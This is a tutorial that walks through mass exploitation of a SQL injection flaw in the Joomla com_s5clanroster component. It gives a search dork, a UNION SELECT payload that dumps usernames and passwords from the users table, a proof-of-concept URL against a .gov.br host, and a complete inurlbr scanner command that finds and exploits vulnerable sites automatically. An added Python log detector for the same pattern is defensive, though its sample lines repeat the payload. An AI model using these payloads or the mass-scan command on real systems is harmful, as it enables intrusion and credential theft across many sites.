In this tutorial we will use the inurlbr tool to find targets and then inject our exploitation string. We will use internal functions of the inurlbr script to convert the injection string into hexadecimal.
The com_s5clanroster component has a SQL injection flaw in its GET parameter "id". This article is based on the script written by the hacker TheLooper (script). Where the injection succeeds, it is possible to access the target server's database information.
DORK:
inurl:"index.php?option=com_s5clanroster"
SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-
POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}
With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr:
http://github.com/googleinurl/SCANNER-INURLBR
SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'
SET FILE OUTPUT:
-s vuln.log
SET TYPE VALIDATION:
-t 3
3 - The third type combines both the first and second types:
it also establishes a connection with the exploit through the GET method.
Demo: www.target.com.br{exploit}
SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}
Before setting the exploit we manipulate its string: we use an internal function of the inurlbr scanner to pass a validation string inside the SQL injection, so that vulnerable targets can be separated from the rest.
Internal function - Converting strings in hexadecimal
hex: encodes values as hexadecimal (this is an encoding, not encryption).
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'
Result inject:
http://www.target.gov.br/user?id=313032303330
--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(<br>) = 3c62723e
Example injection:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'
SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If the specified value is found in the target's response, the target is considered vulnerable.
Setting: -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln" as it was passed inside the SQLi exploit: if that value appears in the target's response, the injection succeeded.
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
PRINT PROCESS: (screenshot of the scanner output; image not reproduced here)
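From the defender's side, the same request pattern is easy to pick out of a web server access log: the `id` parameter carries a MySQL version-comment obfuscated `UNION ... SELECT`, and the marker string and separator travel as `0x` hex literals. The following detector is an added example written for this page, not code from the original post or from the inurlbr project. It assumes Apache/nginx common-log-style lines; the three log lines are constructed samples, with the first two mirroring the injection shown above and the third being a normal request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The first two carry the
# com_s5clanroster injection pattern from this post; the third is a benign request.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:18:37:01 +0000] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20- HTTP/1.1" 200 5120
203.0.113.11 - - [10/Oct/2023:18:37:02 +0000] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20- HTTP/1.1" 200 4811
198.51.100.7 - - [10/Oct/2023:18:38:15 +0000] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=12 HTTP/1.1" 200 9031
"""

# Request line inside a common/combined log entry: "METHOD /path?query HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# MySQL conditional comment /*!50000 keyword */ used to hide keywords from naive filters
VERSION_COMMENT_RE = re.compile(r'/\*!\d{5}\s*([^*]*?)\*/')
# Hex string literals such as 0x3a that smuggle arbitrary bytes without quotes
HEX_LITERAL_RE = re.compile(r'0x([0-9a-fA-F]{2,})')
UNION_SELECT_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE)


def normalize_sql(value):
    """Unwrap /*!NNNNN keyword */ comments and collapse whitespace so keyword
    checks see the SQL the server would actually execute."""
    unwrapped = VERSION_COMMENT_RE.sub(r' \1 ', value)
    return re.sub(r'\s+', ' ', unwrapped).strip()


def decode_hex_literals(sql):
    """Decode every 0x... literal to text so the analyst can see the marker
    (for example 'inurlbr_vuln') and separators the scanner embedded."""
    decoded = []
    for digits in HEX_LITERAL_RE.findall(sql):
        if len(digits) % 2:
            continue  # odd-length literal cannot be a whole byte string
        try:
            decoded.append(bytes.fromhex(digits).decode('ascii'))
        except (ValueError, UnicodeDecodeError):
            decoded.append('<non-ascii>')
    return decoded


def analyze_line(line):
    """Return a finding dict for a log line whose query string contains a
    UNION/SELECT injection, or None for a clean line."""
    match = REQ_RE.search(line)
    if not match:
        return None
    client = line.split(' ', 1)[0]
    query = urlsplit(match.group('target')).query
    # parse_qs percent-decodes values and turns '+' into spaces for us
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            sql = normalize_sql(raw)
            if UNION_SELECT_RE.search(sql):
                return {
                    'client': client,
                    'param': name,
                    'version_comment_obfuscation': bool(VERSION_COMMENT_RE.search(raw)),
                    'decoded_hex': decode_hex_literals(sql),
                }
    return None


def scan_log(text):
    """Run analyze_line over every line of a log and collect the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The decoded hex literals are what make the scanner's traffic recognisable: a request whose `id` parameter yields `inurlbr_vuln` and `<br>` after decoding is the validation string from this tutorial, so a rule on that decoded text is more robust than matching the raw `0x...` bytes, which change whenever the marker does. Unwrapping `/*!50000...*/` before the keyword check is the important step; a filter that looks for `union select` in the raw parameter never sees it.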